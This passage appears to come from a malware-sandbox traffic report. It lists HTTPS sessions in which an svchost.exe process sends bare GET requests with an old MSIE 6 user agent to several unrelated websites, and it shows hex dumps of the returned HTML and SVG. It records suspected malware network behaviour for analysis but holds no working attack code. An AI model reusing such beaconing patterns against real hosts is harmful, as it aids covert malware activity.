                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6848INData Raw: 34 36 30 0d 0a 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61
                                                                                                                                                                                                                                                                          Data Ascii: 460e.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script langua
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6849INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          79192.168.2.66660104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6685OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          Cookie: django_language=en
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6751INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:55:58 GMT
                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:55:58 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hg4CvQlXCDKRe%2BYNZxywVrWOXmk8eRBEknrdszD9lF0IvGEKOXjpYslM6h4aKkmHrMbjhyAxBdLr8N53PHjhZGsQTSNuXrb5gO%2BHRgw1LytNCwr82YWv8NFnUQzLI4p6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e08ebec2c5d-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6751INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6752INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          8192.168.2.65020691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:08 UTC165OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:08 UTC165INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:40 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:08 UTC165INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:08 UTC181INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:07:08 UTC197INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:08 UTC213INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 36 31 37 39 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 38 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.046179 / WebAdministrator (05.07.2023 08:08) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          80192.168.2.67015172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6719OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=e5f9ee2debe661f0885e1046cf211329; path=/
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tF%2FXy0Vr622hmI5pSev31J%2BW2mqcs3q2hNYP%2Bfb4dxYI5nut5NGXp4GzQRBXErkF5s2VuHNLk3ublXd3VKRAu54j5%2FUl0wuWkbFWAu0KsnSNcdu0df32O%2F8CYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e0a2cf2193c-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6882INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          81192.168.2.6625149.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6800OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: nts-web.net
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8232INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 2599149
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                          ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8232INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8248INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                          Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9177INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9193INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9209INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9817INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                          Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9833INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9849INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9865INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
